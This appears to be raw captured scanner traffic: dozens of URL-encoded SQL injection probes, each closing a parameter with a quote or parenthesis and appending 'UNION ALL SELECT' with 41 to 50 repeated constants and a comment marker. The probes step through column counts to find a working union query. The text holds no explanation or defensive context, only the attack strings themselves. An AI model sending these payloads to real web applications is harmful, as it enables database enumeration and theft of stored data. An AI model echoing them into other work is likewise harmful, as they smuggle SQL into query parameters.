-7367%29%20WHERE%208529%3D8529%20UNION%20ALL%20SELECT%208529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529%2C8529--%20 -9326%29%20WHERE%209086%3D9086%20UNION%20ALL%20SELECT%209086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086%2C9086--%20 -7773%29%20WHERE%207356%3D7356%20UNION%20ALL%20SELECT%207356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356%2C7356--%20 -4310%29%20WHERE%204035%3D4035%20UNION%20ALL%20SELECT%204035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035%2C4035--%20 -4265%29%20WHERE%206145%3D6145%20UNION%20ALL%20SELECT%206145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145%2C6145--%20 -7537%20WHERE%206393%3D6393%20UNION%20ALL%20SELECT%206393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393--%20 -6803%20WHERE%206002%3D6002%20UNION%20ALL%20SELECT%206002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002%2C6002--%20 -7179%20WHERE%209113%3D9113%20UNION%20ALL%20SELECT%209113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113--%20 -7172%20WHERE%208895%3D8895%20UNION%20ALL%20SELECT%208895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895%2C8895--%20 -8764%20WHERE%208333%3D8333%20UNION%20ALL%20SELECT%208333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333%2C8333--%20 -8271%20WHERE%209194%3D9194%20UNION%20ALL%20SELECT%209194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194%2C9194--%20 -4291%20WHERE%207363%3D7363%20UNION%20ALL%20SELECT%207363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363%2C7363--%20 -1100%20WHERE%205860%3D5860%20UNION%20ALL%20SELECT%205860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860%2C5860--%20 -5100%20WHERE%203815%3D3815%20UNION%20ALL%20SELECT%203815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815%2C3815--%20 -1005%20WHERE%201448%3D1448%20UNION%20ALL%20SELECT%201448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448%2C1448--%20 -2733%27%29%20UNION%20ALL%20SELECT%207914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914%2C7914--%20 -6404%27%29%20UNION%20ALL%20SELECT%205941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941--%20 -4386%27%29%20UNION%20ALL%20SELECT%207410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410%2C7410--%20 -9497%27%29%20UNION%20ALL%20SELECT%201265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265--%20 -6340%27%29%20UNION%20ALL%20SELECT%209325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325%2C9325--%20 -2929%27%29%20UNION%20ALL%20SELECT%208700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700%2C8700--%20 -9823%27%29%20UNION%20ALL%20SELECT%203045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045%2C3045--%20 -1813%27%29%20UNION%20ALL%20SELECT%204330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330--%20 -6178%27%29%20UNION%20ALL%20SELECT%204652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652%2C4652--%20 -7567%27%29%20UNION%20ALL%20SELECT%207909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909%2C7909--%20 -6363%27%20UNION%20ALL%20SELECT%206388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388%2C6388--%20 -5131%27%20UNION%20ALL%20SELECT%201011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011--%20 -9008%27%20UNION%20ALL%20SELECT%201924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924%2C1924--%20 -1086%27%20UNION%20ALL%20SELECT%208651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651%2C8651--%20 -3928%27%20UNION%20ALL%20SELECT%208263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263--%20 -5721%27%20UNION%20ALL%20SELECT%205975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975%2C5975--%20 -4688%27%20UNION%20ALL%20SELECT%208326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326%2C8326--%20 -1439%27%20UNION%20ALL%20SELECT%202344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344--%20 -4053%27%20UNION%20ALL%20SELECT%204406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406%2C4406--%20 -7053%27%20UNION%20ALL%20SELECT%206905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905%2C6905--%20 -6745%22%20UNION%20ALL%20SELECT%204161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161%2C4161--%20 -6934%22%20UNION%20ALL%20SELECT%204760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760--%20 -3236%22%20UNION%20ALL%20SELECT%206679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679--%20 -3839%22%20UNION%20ALL%20SELECT%208332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332%2C8332--%20 -8103%22%20UNION%20ALL%20SELECT%206377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377--%20 -3460%22%20UNION%20ALL%20SELECT%202404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404%2C2404--%20 -6843%22%20UNION%20ALL%20SELECT%208738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738--%20 -1501%22%20UNION%20ALL%20SELECT%203447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447%2C3447--%20 -1801%22%20UNION%20ALL%20SELECT%209927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927%2C9927--%20 -6523%22%20UNION%20ALL%20SELECT%204777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777--%20 -8606%27%29%20UNION%20ALL%20SELECT%208080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080%2C8080--%20 -9665%27%29%20UNION%20ALL%20SELECT%205686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686%2C5686--%20 -4983%27%29%20UNION%20ALL%20SELECT%207986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986--%20 -9361%27%29%20UNION%20ALL%20SELECT%207572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572--%20 -8370%27%29%20UNION%20ALL%20SELECT%205781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781%2C5781--%20 -1155%27%29%20UNION%20ALL%20SELECT%209002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002%2C9002--%20 -3582%27%29%20UNION%20ALL%20SELECT%204434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434%2C4434--%20 -3912%27%29%20UNION%20ALL%20SELECT%201011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011--%20 -4332%27%29%20UNION%20ALL%20SELECT%205449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449--%20 -1789%27%29%20UNION%20ALL%20SELECT%203775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775%2C3775--%20 -3874%27%29%29%20UNION%20ALL%20SELECT%204704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704%2C4704--%20 -2970%27%29%29%20UNION%20ALL%20SELECT%206797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797--%20 -5912%27%29%29%20UNION%20ALL%20SELECT%209578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578%2C9578--%20 